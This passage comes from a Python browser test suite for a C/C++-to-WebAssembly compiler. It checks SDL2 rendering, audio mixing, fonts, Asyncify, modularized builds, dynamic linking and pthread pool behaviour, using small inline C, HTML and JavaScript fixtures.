canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl2_mouse.js"></script>
</body>
</html>
''')
self.compile_btest([test_file('sdl2_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS=1', '-O2', '--minify=0', '-o', 'sdl2_mouse.js', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_threads
def test_sdl2_threads(self):
self.btest('sdl2_threads.c', expected='4', args=['-s', 'USE_PTHREADS', '-s', 'USE_SDL=2', '-s', 'PROXY_TO_PTHREAD'])
@requires_graphics_hardware
def test_sdl2glshader(self):
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '--closure=1', '-g1', '-s', 'LEGACY_GL_EMULATION'])
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '-s', 'LEGACY_GL_EMULATION'], also_proxied=True) # XXX closure fails on proxy
@requires_graphics_hardware
def test_sdl2_canvas_blank(self):
self.btest('sdl2_canvas_blank.c', reference='sdl_canvas_blank.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_palette(self):
self.btest('sdl2_canvas_palette.c', reference='sdl_canvas_palette.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_twice(self):
self.btest('sdl2_canvas_twice.c', reference='sdl_canvas_twice.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gfx(self):
self.btest('sdl2_gfx.cpp', args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_GFX=2'], reference='sdl2_gfx.png', reference_slack=2)
@requires_graphics_hardware
def test_sdl2_canvas_palette_2(self):
create_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-r.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-g.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-b.js'])
def test_sdl2_swsurface(self):
self.btest('sdl2_swsurface.c', expected='1', args=['-s', 'USE_SDL=2', '-s', 'INITIAL_MEMORY=64MB'])
@requires_graphics_hardware
def test_sdl2_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_canvas_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
            // wait for rAFs (requestAnimationFrame callbacks) to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
create_file('test.html', html)
create_file('data.txt', 'datum')
self.btest('sdl2_canvas_proxy.c', reference='sdl2_canvas.png', args=['-s', 'USE_SDL=2', '--proxy-to-worker', '--preload-file', 'data.txt', '-s', 'GL_TESTING'], manual_reference=True, post_build=post)
def test_sdl2_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest('sdl2_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
def test_sdl2_timer(self):
self.btest('sdl2_timer.c', expected='5', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_size(self):
self.btest('sdl2_canvas_size.c', expected='1', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_read(self):
# SDL, OpenGL, readPixels
self.compile_btest([test_file('sdl2_gl_read.c'), '-o', 'something.html', '-s', 'USE_SDL=2'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_glmatrixmode_texture(self):
self.btest('sdl2_glmatrixmode_texture.c', reference='sdl2_glmatrixmode_texture.png',
args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_SDL=2'],
message='You should see a (top) red-white and (bottom) white-red image.')
@requires_graphics_hardware
def test_sdl2_gldrawelements(self):
self.btest('sdl2_gldrawelements.c', reference='sdl2_gldrawelements.png',
args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_SDL=2'],
message='GL drawing modes. Bottom: points, lines, line loop, line strip. Top: triangles, triangle strip, triangle fan, quad.')
@requires_graphics_hardware
def test_sdl2_fog_simple(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-O2', '--minify=0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_negative(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_negative.c', reference='screenshot-fog-negative.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_density(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_density.c', reference='screenshot-fog-density.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_exp2(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_linear(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_unwasteful(self):
self.btest('sdl2_unwasteful.cpp', expected='1', args=['-s', 'USE_SDL=2', '-O1'])
def test_sdl2_canvas_write(self):
self.btest('sdl2_canvas_write.cpp', expected='0', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_frames_swap(self):
def post_build(*args):
self.post_manual_reftest(*args)
html = open('test.html').read()
html2 = html.replace('''Module['postRun'] = doReftest;''', '') # we don't want the very first frame
assert html != html2
create_file('test.html', html2)
self.btest('sdl2_gl_frames_swap.c', reference='sdl2_gl_frames_swap.png', args=['--proxy-to-worker', '-s', 'GL_TESTING', '-s', 'USE_SDL=2'], manual_reference=True, post_build=post_build)
@requires_graphics_hardware
def test_sdl2_ttf(self):
shutil.copy2(test_file('freetype', 'LiberationSansBold.ttf'), self.get_dir())
self.btest('sdl2_ttf.c', reference='sdl2_ttf.png',
args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'LiberationSansBold.ttf'],
message='You should see colorful "hello" and "world" in the window')
@requires_graphics_hardware
def test_sdl2_ttf_rtl(self):
shutil.copy2(test_file('third_party', 'notofont', 'NotoNaskhArabic-Regular.ttf'), self.get_dir())
self.btest('sdl2_ttf_rtl.c', reference='sdl2_ttf_rtl.png',
args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'NotoNaskhArabic-Regular.ttf'],
message='You should see colorful "سلام" and "جهان" with shaped Arabic script in the window')
def test_sdl2_custom_cursor(self):
shutil.copyfile(test_file('cursor.bmp'), 'cursor.bmp')
self.btest('sdl2_custom_cursor.c', expected='1', args=['--preload-file', 'cursor.bmp', '-s', 'USE_SDL=2'])
def test_sdl2_misc(self):
self.btest_exit('sdl2_misc.c', args=['-s', 'USE_SDL=2'])
@disabled('https://github.com/emscripten-core/emscripten/issues/13101')
def test_sdl2_misc_main_module(self):
self.btest_exit('sdl2_misc.c', args=['-s', 'USE_SDL=2', '-s', 'MAIN_MODULE'])
def test_sdl2_misc_via_object(self):
self.run_process([EMCC, '-c', test_file('sdl2_misc.c'), '-s', 'USE_SDL=2', '-o', 'test.o'])
self.compile_btest(['test.o', '-s', 'EXIT_RUNTIME', '-s', 'USE_SDL=2', '-o', 'test.html'])
self.run_browser('test.html', '...', '/report_result?exit:0')
@parameterized({
'dash_s': (['-s', 'USE_SDL=2', '-s', 'USE_SDL_MIXER=2'],),
'dash_l': (['-lSDL2', '-lSDL2_mixer'],),
})
@requires_sound_hardware
def test_sdl2_mixer_wav(self, flags):
shutil.copyfile(test_file('sounds', 'the_entertainer.wav'), 'sound.wav')
self.btest('sdl2_mixer_wav.c', expected='1', args=['--preload-file', 'sound.wav', '-s', 'INITIAL_MEMORY=33554432'] + flags)
@parameterized({
'wav': ([], '0', 'the_entertainer.wav'),
'ogg': (['ogg'], 'MIX_INIT_OGG', 'alarmvictory_1.ogg'),
'mp3': (['mp3'], 'MIX_INIT_MP3', 'pudinha.mp3'),
'mod': (['mod'], 'MIX_INIT_MOD', 'bleep.xm'),
})
@requires_sound_hardware
def test_sdl2_mixer_music(self, formats, flags, music_name):
shutil.copyfile(test_file('sounds', music_name), music_name)
self.btest('sdl2_mixer_music.c', expected='1', args=[
'--preload-file', music_name,
'-DSOUND_PATH=' + json.dumps(music_name),
'-DFLAGS=' + flags,
'-s', 'USE_SDL=2',
'-s', 'USE_SDL_MIXER=2',
'-s', 'SDL2_MIXER_FORMATS=' + json.dumps(formats),
'-s', 'INITIAL_MEMORY=33554432'
])
@no_wasm_backend('cocos2d needs to be ported')
@requires_graphics_hardware
def test_cocos2d_hello(self):
cocos2d_root = os.path.join(system_libs.Ports.get_build_dir(), 'cocos2d')
preload_file = os.path.join(cocos2d_root, 'samples', 'HelloCpp', 'Resources') + '@'
self.btest('cocos2d_hello.cpp', reference='cocos2d_hello.png', reference_slack=1,
args=['-s', 'USE_COCOS2D=3', '-s', 'ERROR_ON_UNDEFINED_SYMBOLS=0',
'--preload-file', preload_file, '--use-preload-plugins',
'-Wno-inconsistent-missing-override'],
message='You should see Cocos2d logo')
def test_async(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('browser/async.cpp', '1', args=['-O' + str(opts), '-g2', '-s', 'ASYNCIFY'])
def test_asyncify_tricky_function_sig(self):
self.btest('browser/test_asyncify_tricky_function_sig.cpp', '85', args=['-s', 'ASYNCIFY_ONLY=[foo(char.const*?.int#),foo2(),main,__original_main]', '-s', 'ASYNCIFY=1'])
@requires_threads
def test_async_in_pthread(self):
self.btest('browser/async.cpp', '1', args=['-s', 'ASYNCIFY', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-g'])
def test_async_2(self):
    # Error.stackTraceLimit defaults to 10 in Chrome, but this test relies on
    # more than 40 stack frames being reported.
create_file('pre.js', 'Error.stackTraceLimit = 80;\n')
self.btest('browser/async_2.cpp', '40', args=['-O3', '--pre-js', 'pre.js', '-s', 'ASYNCIFY'])
def test_async_virtual(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_virtual.cpp', '5', args=['-O' + str(opts), '-profiling', '-s', 'ASYNCIFY'])
def test_async_virtual_2(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_virtual_2.cpp', '1', args=['-O' + str(opts), '-s', 'ASSERTIONS', '-s', 'SAFE_HEAP', '-profiling', '-s', 'ASYNCIFY'])
  # Test async sleeps in the presence of invoke_* calls, which can happen with
  # longjmp or exceptions (see the illustrative sketch after this test).
@parameterized({
'O0': ([],), # noqa
'O3': (['-O3'],), # noqa
})
def test_async_longjmp(self, args):
self.btest('browser/async_longjmp.cpp', '2', args=args + ['-s', 'ASYNCIFY'])
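  # For reference, a minimal sketch of the pattern exercised above (illustrative
  # only; this helper and its file are not part of the original suite, and the
  # runner ignores non-test_ methods): a sleep inside a setjmp/longjmp region
  # must unwind and rewind through the invoke_* wrappers.
  def example_async_longjmp_source(self):
    create_file('example_async_longjmp.c', r'''
      #include <setjmp.h>
      #include <emscripten.h>
      static jmp_buf env;
      int main() {
        if (!setjmp(env)) {
          emscripten_sleep(1); // Asyncify unwinds here, inside an invoke_* frame
          longjmp(env, 1);     // control returns to setjmp via the invoke_* machinery
        }
        return 0;
      }
    ''')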
def test_async_mainloop(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_mainloop.cpp', '121', args=['-O' + str(opts), '-s', 'ASYNCIFY'])
@requires_sound_hardware
def test_sdl_audio_beep_sleep(self):
self.btest('sdl_audio_beep_sleep.cpp', '1', args=['-Os', '-s', 'ASSERTIONS', '-s', 'DISABLE_EXCEPTION_CATCHING=0', '-profiling', '-s', 'SAFE_HEAP', '-lSDL', '-s', 'ASYNCIFY'], timeout=90)
def test_mainloop_reschedule(self):
self.btest('mainloop_reschedule.cpp', '1', args=['-Os', '-s', 'ASYNCIFY'])
def test_mainloop_infloop(self):
self.btest('mainloop_infloop.cpp', '1', args=['-s', 'ASYNCIFY'])
def test_async_iostream(self):
self.btest('browser/async_iostream.cpp', '1', args=['-s', 'ASYNCIFY'])
  # Test an async return value. The value goes through a custom JS library
  # method that uses asyncify, and therefore it needs to be declared in
  # ASYNCIFY_IMPORTS (a sketch of such a library method follows this test).
  # To make the test more precise we also use ASYNCIFY_IGNORE_INDIRECT here.
@parameterized({
'normal': (['-s', 'ASYNCIFY_IMPORTS=[sync_tunnel]'],), # noqa
'response': (['-s', 'ASYNCIFY_IMPORTS=@filey.txt'],), # noqa
'nothing': (['-DBAD'],), # noqa
'empty_list': (['-DBAD', '-s', 'ASYNCIFY_IMPORTS=[]'],), # noqa
'em_js_bad': (['-DBAD', '-DUSE_EM_JS'],), # noqa
})
def test_async_returnvalue(self, args):
if '@' in str(args):
create_file('filey.txt', '["sync_tunnel"]')
self.btest('browser/async_returnvalue.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_IGNORE_INDIRECT', '--js-library', test_file('browser', 'async_returnvalue.js')] + args + ['-s', 'ASSERTIONS'])
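  # A minimal sketch (not the actual async_returnvalue.js used above) of a JS
  # library import that produces its return value asynchronously via
  # Asyncify.handleSleep, and must therefore be listed in ASYNCIFY_IMPORTS.
  # Illustrative only; the runner ignores non-test_ methods.
  def example_asyncify_import_library(self):
    create_file('example_sync_tunnel.js', '''
      mergeInto(LibraryManager.library, {
        sync_tunnel: function(value) {
          return Asyncify.handleSleep(function(wakeUp) {
            // deliver the return value on a later turn of the event loop
            setTimeout(function() { wakeUp(value + 1); }, 0);
          });
        }
      });
    ''')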
def test_async_stack_overflow(self):
self.btest('browser/async_stack_overflow.cpp', 'abort:RuntimeError: unreachable', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_STACK_SIZE=4'])
def test_async_bad_list(self):
self.btest('browser/async_bad_list.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_ONLY=[waka]', '--profiling'])
# Tests that when building with -s MINIMAL_RUNTIME=1, the build can use -s MODULARIZE=1 as well.
def test_minimal_runtime_modularize(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-s', 'MODULARIZE', '-s', 'MINIMAL_RUNTIME'])
self.run_browser('test.html', None, '/report_result?0')
@requires_sync_compilation
def test_modularize(self):
for opts in [
[],
['-O1'],
['-O2', '-profiling'],
['-O2'],
['-O2', '--closure=1']
]:
for args, code in [
# defaults
([], '''
let promise = Module();
          if (!(promise instanceof Promise)) throw new Error('Return value should be a promise');
'''),
# use EXPORT_NAME
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
if (typeof Module !== "undefined") throw "what?!"; // do not pollute the global scope, we are modularized!
          HelloWorld.noInitialRun = true; // an erroneous module capture would pick this up and cause a timeout
          let promise = HelloWorld();
          if (!(promise instanceof Promise)) throw new Error('Return value should be a promise');
'''),
# pass in a Module option (which prevents main(), which we then invoke ourselves)
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
HelloWorld({ noInitialRun: true }).then(hello => {
hello._main();
});
'''),
# Even without a mem init file, everything is async
(['-s', 'EXPORT_NAME="HelloWorld"', '--memory-init-file', '0'], '''
HelloWorld({ noInitialRun: true }).then(hello => {
hello._main();
});
'''),
]:
print('test on', opts, args, code)
# this test is synchronous, so avoid async startup due to wasm features
self.compile_btest([test_file('browser_test_hello_world.c'), '-s', 'MODULARIZE', '-s', 'SINGLE_FILE'] + args + opts)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
%s
</script>
''' % code)
self.run_browser('a.html', '...', '/report_result?0')
def test_modularize_network_error(self):
test_c_path = test_file('browser_test_hello_world.c')
browser_reporting_js_path = test_file('browser_reporting.js')
self.compile_btest([test_c_path, '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path], reporting=Reporting.NONE)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
createModule()
.then(() => {
reportResultToServer("Module creation succeeded when it should have failed");
})
.catch(err => {
reportResultToServer(err.message.slice(0, 54));
});
</script>
''')
print('Deleting a.out.wasm to cause a download error')
os.remove('a.out.wasm')
self.run_browser('a.html', '...', '/report_result?abort(both async and sync fetching of the wasm failed)')
def test_modularize_init_error(self):
test_cpp_path = test_file('browser', 'test_modularize_init_error.cpp')
browser_reporting_js_path = test_file('browser_reporting.js')
self.compile_btest([test_cpp_path, '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path], reporting=Reporting.NONE)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
if (typeof window === 'object') {
window.addEventListener('unhandledrejection', function(event) {
reportResultToServer("Unhandled promise rejection: " + event.reason.message);
});
}
createModule()
.then(() => {
reportResultToServer("Module creation succeeded when it should have failed");
})
.catch(err => {
reportResultToServer(err);
});
</script>
''')
self.run_browser('a.html', '...', '/report_result?intentional error to test rejection')
  # test illustrating the regression in the modularize feature since commit c5af8f6
  # when compiling with the --preload-file option
def test_modularize_and_preload_files(self):
    # a non-default amount of memory to allocate for the emscripten heap
totalMemory = 33554432
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure=1']]:
# the main function simply checks that the amount of allocated heap memory is correct
create_file('test.c', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
EM_ASM({
            // access INITIAL_MEMORY with a string key so the closure-compiler-enabled build does not minify it
var totalMemory = Module['INITIAL_MEMORY'];
assert(totalMemory === %d, 'bad memory size');
});
REPORT_RESULT(0);
return 0;
}
''' % totalMemory)
# generate a dummy file
create_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
# no wasm, since this tests customizing total memory at runtime
self.compile_btest(['test.c', '-s', 'WASM=0', '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
// instantiate the Foo module with custom INITIAL_MEMORY value
var foo = Foo({ INITIAL_MEMORY: %d });
</script>
''' % totalMemory)
self.run_browser('a.html', '...', '/report_result?0')
def test_webidl(self):
# see original in test_core.py
self.run_process([PYTHON, path_from_root('tools', 'webidl_binder.py'),
test_file('webidl', 'test.idl'),
'glue'])
self.assertExists('glue.cpp')
self.assertExists('glue.js')
for opts in [[], ['-O1'], ['-O2']]:
print(opts)
self.btest(os.path.join('webidl', 'test.cpp'), '1', args=['--post-js', 'glue.js', '-I.', '-DBROWSER'] + opts)
@requires_sync_compilation
def test_dynamic_link(self):
create_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
create_file('main.cpp', r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <emscripten.h>
char *side(const char *data);
int main() {
char *temp = side("hello through side\n");
char *ret = (char*)malloc(strlen(temp)+1);
strcpy(ret, temp);
temp[1] = 'x';
EM_ASM({
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = x;
Module.realPrint(x);
};
});
puts(ret);
EM_ASM({ assert(Module.printed === 'hello through side', ['expected', Module.printed]); });
REPORT_RESULT(2);
return 0;
}
''')
create_file('side.cpp', r'''
#include <stdlib.h>
#include <string.h>
char *side(const char *data);
char *side(const char *data) {
char *ret = (char*)malloc(strlen(data)+1);
strcpy(ret, data);
return ret;
}
''')
self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE', '-O2', '-o', 'side.wasm', '-s', 'EXPORT_ALL'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE', '-O2', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL'])
print('wasm in worker (we can read binary data synchronously there)')
create_file('pre.js', '''
var Module = { dynamicLibraries: ['side.wasm'] };
''')
self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE', '-O2', '-o', 'side.wasm', '-s', 'EXPORT_ALL'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE', '-O2', '--pre-js', 'pre.js', '--proxy-to-worker', '-s', 'EXPORT_ALL'])
print('wasm (will auto-preload since no sync binary reading)')
create_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
# same wasm side module works
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE', '-O2', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL'])
# verify that dynamic linking works in all kinds of in-browser environments.
# don't mix different kinds in a single test.
@parameterized({
'': ([0],),
'inworker': ([1],),
})
def test_dylink_dso_needed(self, inworker):
self.emcc_args += ['-O2']
# --proxy-to-worker only on main
if inworker:
self.emcc_args += ['--proxy-to-worker']
def do_run(src, expected_output):
      # XXX there is no infrastructure (yet?) to retrieve stdout from the browser
      # in tests, so do the assertion about the expected output inside the browser.
      #
      # We have to put the hook into post.js: in main() it would be too late (we
      # could not catch what static constructors inside linked dynlibs printed),
      # and in pre.js it is too early (out is not yet set up by the shell).
create_file('post.js', r'''
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = "";
          Module.printed += x + '\n'; // out is passed the string without its trailing \n
Module.realPrint(x);
};
''')
create_file('test_dylink_dso_needed.c', src + r'''
#include <emscripten/em_asm.h>
int main() {
int rtn = test_main();
EM_ASM({
var expected = %r;
assert(Module.printed === expected, ['stdout expected:', expected]);
});
return rtn;
}
''' % expected_output)
self.btest_exit(self.in_dir('test_dylink_dso_needed.c'), args=self.get_emcc_args() + ['--post-js', 'post.js'])
self._test_dylink_dso_needed(do_run)
@requires_graphics_hardware
@requires_sync_compilation
def test_dynamic_link_glemu(self):
create_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
const char *side();
int main() {
const char *exts = side();
puts(side());
assert(strstr(exts, "GL_EXT_texture_env_combine"));
REPORT_RESULT(1);
return 0;
}
''')
create_file('side.cpp', r'''
#include "SDL/SDL.h"
#include "SDL/SDL_opengl.h"
const char *side() {
SDL_Init(SDL_INIT_VIDEO);
SDL_SetVideoMode(600, 600, 16, SDL_OPENGL);
return (const char *)glGetString(GL_EXTENSIONS);
}
''')
self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE', '-O2', '-o', 'side.wasm', '-lSDL', '-s', 'EXPORT_ALL'])
self.btest(self.in_dir('main.cpp'), '1', args=['-s', 'MAIN_MODULE', '-O2', '-s', 'LEGACY_GL_EMULATION', '-lSDL', '-lGL', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL'])
def test_dynamic_link_many(self):
# test asynchronously loading two side modules during startup
create_file('pre.js', '''
Module.dynamicLibraries = ['side1.wasm', 'side2.wasm'];
''')
create_file('main.c', r'''
int side1();
int side2();
int main() {
return side1() + side2();
}
''')
create_file('side1.c', r'''
int side1() { return 1; }
''')
create_file('side2.c', r'''
int side2() { return 2; }
''')
self.run_process([EMCC, 'side1.c', '-s', 'SIDE_MODULE', '-o', 'side1.wasm'])
self.run_process([EMCC, 'side2.c', '-s', 'SIDE_MODULE', '-o', 'side2.wasm'])
self.btest_exit(self.in_dir('main.c'), assert_returncode=3,
args=['-s', 'MAIN_MODULE', '--pre-js', 'pre.js'])
def test_dynamic_link_pthread_many(self):
# Test asynchronously loading two side modules during startup
# They should always load in the same order
# Verify that function pointers in the browser's main thread
    # refer to the same function as in a pthread worker.
# The main thread function table is populated asynchronously
# in the browser's main thread. However, it should still be
# populated in the same order as in a pthread worker to
# guarantee function pointer interop.
create_file('main.cpp', r'''
#include <thread>
int side1();
int side2();
int main() {
auto side1_ptr = &side1;
auto side2_ptr = &side2;
// Don't join the thread since this is running in the
// browser's main thread.
std::thread([=]{
REPORT_RESULT(int(
side1_ptr == &side1 &&
side2_ptr == &side2
));
}).detach();
return 0;
}
''')
# The browser will try to load side1 first.
# Use a big payload in side1 so that it takes longer to load than side2
create_file('side1.cpp', r'''
char const * payload1 = "''' + str(list(range(1, int(1e5)))) + r'''";
int side1() { return 1; }
''')
create_file('side2.cpp', r'''
char const * payload2 = "0";
int side2() { return 2; }
''')
self.run_process([EMCC, 'side1.cpp', '-Wno-experimental', '-pthread', '-s', 'SIDE_MODULE', '-o', 'side1.wasm'])
self.run_process([EMCC, 'side2.cpp', '-Wno-experimental', '-pthread', '-s', 'SIDE_MODULE', '-o', 'side2.wasm'])
self.btest(self.in_dir('main.cpp'), '1',
args=['-Wno-experimental', '-pthread', '-s', 'MAIN_MODULE',
'-s', 'RUNTIME_LINKED_LIBS=[side1.wasm,side2.wasm]'])
def test_memory_growth_during_startup(self):
create_file('data.dat', 'X' * (30 * 1024 * 1024))
self.btest('browser_test_hello_world.c', '0', args=['-s', 'ASSERTIONS', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'INITIAL_MEMORY=16MB', '-s', 'TOTAL_STACK=16384', '--preload-file', 'data.dat'])
# pthreads tests
def prep_no_SAB(self):
create_file('html.html', open(path_from_root('src', 'shell_minimal.html')).read().replace('''<body>''', '''<body>
<script>
SharedArrayBuffer = undefined;
Atomics = undefined;
</script>
'''))
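  # Hypothetical usage of prep_no_SAB (illustrative only; the runner ignores
  # non-test_ methods): build against the patched shell so the page sees no
  # SharedArrayBuffer, which lets a test verify graceful behavior when the
  # browser lacks thread support.
  def example_prep_no_SAB_usage(self):
    self.prep_no_SAB()
    self.compile_btest([test_file('browser_test_hello_world.c'), '-s', 'USE_PTHREADS',
                        '--shell-file', 'html.html', '-o', 'test.html'])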
@requires_threads
def test_pthread_c11_threads(self):
self.btest(test_file('pthread', 'test_pthread_c11_threads.c'),
expected='0',
args=['-g4', '-std=gnu11', '-xc', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'TOTAL_MEMORY=64mb'])
@requires_threads
def test_pthread_pool_size_strict(self):
# Check that it doesn't fail with sufficient number of threads in the pool.
self.btest(test_file('pthread', 'test_pthread_c11_threads.c'),
expected='0',
args=['-g2', '-xc', '-std=gnu11', '-pthread', '-s', 'PTHREAD_POOL_SIZE=4', '-s', 'PTHREAD_POOL_SIZE_STRICT=2', '-s', 'TOTAL_MEMORY=64mb'])
# Check that it fails instead of deadlocking on insufficient number of threads in the pool.
self.btest(test_file('pthread', 'test_pthread_c11_threads.c'),
expected='abort:Assertion failed: thrd_create(&t4, thread_main, NULL) == thrd_success',
args=['-g2', '-xc', '-std=gnu11', '-pthread', '-s', 'PTHREAD_POOL_SIZE=3', '-s', 'PTHREAD_POOL_SIZE_STRICT=2', '-s', 'TOTAL_MEMORY=64mb'])
@requires_threads
def test_pthread_in_pthread_pool_size_strict(self):
    # Check that it succeeds when the pool is large enough for a pthread to create another pthread.
self.btest(test_file('pthread', 'test_pthread_create_pthread.cpp'), expected='1', args=['-g2', '-pthread', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'PTHREAD_POOL_SIZE_STRICT=2'])
    # Check that it fails when the pool is too small for a pthread to create another pthread.
self.btest(test_file('pthread', 'test_pthread_create_pthread.cpp'), expected='-200', args=['-g2', '-pthread', '-s', 'PTHREAD_POOL_SIZE=1', '-s', 'PTHREAD_POOL_SIZE_STRICT=2'])
  # Test that the emscripten_ atomics API functions work.
@parameterized({
'normal': ([],),
